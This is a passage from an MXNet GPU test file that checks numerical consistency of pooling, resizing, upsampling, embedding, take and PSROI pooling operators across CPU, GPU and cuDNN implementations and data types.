# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list, scale=0.5)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params, scale=0.1)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
